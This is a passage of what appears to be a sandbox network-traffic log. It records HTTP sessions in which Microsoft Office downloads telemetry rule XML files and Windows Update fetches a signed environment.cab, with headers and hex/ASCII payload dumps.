                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      134192.168.2.74993113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:20 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                      x-ms-request-id: 8222e379-801e-008f-078c-3a2c5d000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164220Z-185f5d8b95crl6swhC1NYC3ueg0000000am000000000rw60
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:20 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      135192.168.2.74993613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:22 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                      x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164222Z-185f5d8b95cdh56ghC1NYCk1x4000000047000000000xuzr
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      136192.168.2.74993813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:22 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                      x-ms-request-id: bfe6e8fa-201e-006e-3f8c-3abbe3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164222Z-1777c6cb754n67brhC1TEBcp9c0000000a00000000003d86
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      137192.168.2.74993713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:22 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                      x-ms-request-id: b82dd3a8-b01e-0053-0e8c-3acdf8000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164222Z-185f5d8b95csd4bwhC1NYCq7dc0000000abg00000000qs38
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      138192.168.2.74994113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:22 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                      x-ms-request-id: 06bc2162-901e-0016-6af6-3aefe9000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164222Z-185f5d8b95cp7lkfhC1NYC7rpw0000000am000000000qdx2
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      139192.168.2.74994213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:22 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1425
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                      x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164222Z-r1d97b9957744xz5hC1TEB5bf8000000092g000000004aby
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      140192.168.2.74993220.12.23.50443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:22 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1ChdEyHYRNkdE3F&MD=2f2hpuyv HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                      ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                      MS-CorrelationId: a29cec75-87b5-4397-9ea6-782d225fe72a
                                                                                                                                                                                                                      MS-RequestId: 1f05cf3d-082b-4e0b-9ea7-e6c9262edfa7
                                                                                                                                                                                                                      MS-CV: yH3+H0hgHk2XVWuJ.0
                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:22 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 30005
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                      Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                      2024-11-20 16:42:23 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                      Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      141192.168.2.74995113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:24 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:25 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1378
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                      x-ms-request-id: 0c3517a5-201e-0003-7a8c-3af85a000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164225Z-185f5d8b95c96jn4hC1NYCbgp80000000agg00000000cgdb
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      142192.168.2.74994913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:24 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:25 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1388
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
